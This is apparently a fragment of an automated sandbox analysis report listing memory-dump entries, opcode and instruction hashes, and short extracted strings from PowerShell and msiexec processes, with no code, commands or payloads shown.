                                                                  • API String ID: 0-3859475322
                                                                  • Opcode ID: 022cd9d420431d5934ff557d88fed52bbba6e367b54266dc69bcea83c485ddeb
                                                                  • Instruction ID: f82e53dd914cb6da8e9e67f694d9e10e9031cab3c6de33197384b07a302d684b
                                                                  • Opcode Fuzzy Hash: 022cd9d420431d5934ff557d88fed52bbba6e367b54266dc69bcea83c485ddeb
                                                                  • Instruction Fuzzy Hash: 5FC146F17042558FCB158A79884967ABBA29F82311F1C84BBD94ECF791DA32DC42C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84!l$84!l$tP^q$tP^q
                                                                  • API String ID: 0-2671327094
                                                                  • Opcode ID: 7176b3fa4c58871300e434c0fd39dd6692e54965582b48788726afc10691e0b3
                                                                  • Instruction ID: b161b65bd1fac7e1c677c25fff4193ed53de8f418f055dcab49520bdc0144273
                                                                  • Opcode Fuzzy Hash: 7176b3fa4c58871300e434c0fd39dd6692e54965582b48788726afc10691e0b3
                                                                  • Instruction Fuzzy Hash: 8F9136B1B002969FCB149F79844877ABFE2AF85711F1C846AD9178F380CE31D841C7A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-2541482469
                                                                  • Opcode ID: 3aab086a6025fbf1b22c26b80425a657d53504052051cfd97febb7a065e35e1e
                                                                  • Instruction ID: 531924599dabcb2296c703f1ff38aa975d5fd55eea17fd05a9feece55c52d712
                                                                  • Opcode Fuzzy Hash: 3aab086a6025fbf1b22c26b80425a657d53504052051cfd97febb7a065e35e1e
                                                                  • Instruction Fuzzy Hash: A8A19EF8A00616DBCB20CF64C445A6AFBB2BF85314F18C96DD8576B744CB32A842CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-2541482469
                                                                  • Opcode ID: def9963eba3efc3b2aaceebaf99fb8a2b6bd4ce212454cf17fa15ef8b56cc8f4
                                                                  • Instruction ID: 616e139ef45f0a39e044326883dcdee4852925767d0a17dcf7efe1621cd0bdbc
                                                                  • Opcode Fuzzy Hash: def9963eba3efc3b2aaceebaf99fb8a2b6bd4ce212454cf17fa15ef8b56cc8f4
                                                                  • Instruction Fuzzy Hash: 51A18DF8A10616DBCB20CF64C445A6AF7B2BF89714F18C969D8176B744CF32A842CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$XY#l$XY#l
                                                                  • API String ID: 0-3017105699
                                                                  • Opcode ID: 8e48acdfea02241cc646e9e42cc507621f36832deda472c3a3df7ce55165c046
                                                                  • Instruction ID: 083f9763b0984159821debe83080053e753358da8f943098f57e52307600c2d7
                                                                  • Opcode Fuzzy Hash: 8e48acdfea02241cc646e9e42cc507621f36832deda472c3a3df7ce55165c046
                                                                  • Instruction Fuzzy Hash: 88810CB170435A8FCF159B78D81966ABBA2AF86311F28C0A7D84ACF351DA35C8C5C791
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$4'^q$4 l
                                                                  • API String ID: 0-4178797188
                                                                  • Opcode ID: 672ae821e71b57acb1b358fa1224569c7f31cf2a6f49c1b5d3d19d8f3d2c775f
                                                                  • Instruction ID: 5c971d91d8acd9b6a2bda1a28f37941477532bc1144c5450716ff07a22b3e2ed
                                                                  • Opcode Fuzzy Hash: 672ae821e71b57acb1b358fa1224569c7f31cf2a6f49c1b5d3d19d8f3d2c775f
                                                                  • Instruction Fuzzy Hash: F3518EB4A04245DFCB14CB68C459A6ABBF2BF89311F18846ADD066B755CB33EC81CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                  • API String ID: 0-2125118731
                                                                  • Opcode ID: 0f24f08f74b284df07315a265a227d806e33814c03b1d65e72eb67909d8a8a29
                                                                  • Instruction ID: 812fee26c8fb44448fc499387a8cc022f434664163c83ba6665831734fe9a77a
                                                                  • Opcode Fuzzy Hash: 0f24f08f74b284df07315a265a227d806e33814c03b1d65e72eb67909d8a8a29
                                                                  • Instruction Fuzzy Hash: AD213AB1B1025E5BDB2C597A881AB27A7D65BC2716F28842A9A0BCB385DD35C8428260
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2970679614.000000000040D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0040D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_40d000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1d95124d9f41ad24a9693f2a9cc3d34b0d5f63e14b4034e6598352bad7ce69a
                                                                  • Instruction ID: e9f72c8cbf691680054bbd4f7596c4e9962aca8860d2340b87d2a7defb5cf525
                                                                  • Opcode Fuzzy Hash: a1d95124d9f41ad24a9693f2a9cc3d34b0d5f63e14b4034e6598352bad7ce69a
                                                                  • Instruction Fuzzy Hash: 8E312D7554D3C49FC7078B64C8A4711BF71AB47214F29C5EBD8898F2A3C639980ECB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2970679614.000000000040D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0040D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_40d000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d6a9e8edb176f540905aaea17a0c56f9abcc70d7d10d01999715416393a7d58
                                                                  • Instruction ID: a32215357cdd3017463765084d34fe1f5868dc9aceff7bedd8d55b19eb37ad7a
                                                                  • Opcode Fuzzy Hash: 3d6a9e8edb176f540905aaea17a0c56f9abcc70d7d10d01999715416393a7d58
                                                                  • Instruction Fuzzy Hash: 0D210675A042049FCB14CF54C8C4B16BB61EB84318F20C57AD84D1B381C73AD84BDA66
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2970858950.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_430000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4a1176196818e267bbef7e2291a5328f0661f288a25d9fdad9f835c1d6980ebf
                                                                  • Instruction ID: 54feaa7e24500a3030aa1df4c7c58646d70a99dfac9ba9216264fc9baf350589
                                                                  • Opcode Fuzzy Hash: 4a1176196818e267bbef7e2291a5328f0661f288a25d9fdad9f835c1d6980ebf
                                                                  • Instruction Fuzzy Hash: 80F017B0E112258F8B84EF7CC40456A77F0AF0C211B2144BAD809DB361EA309D058BD1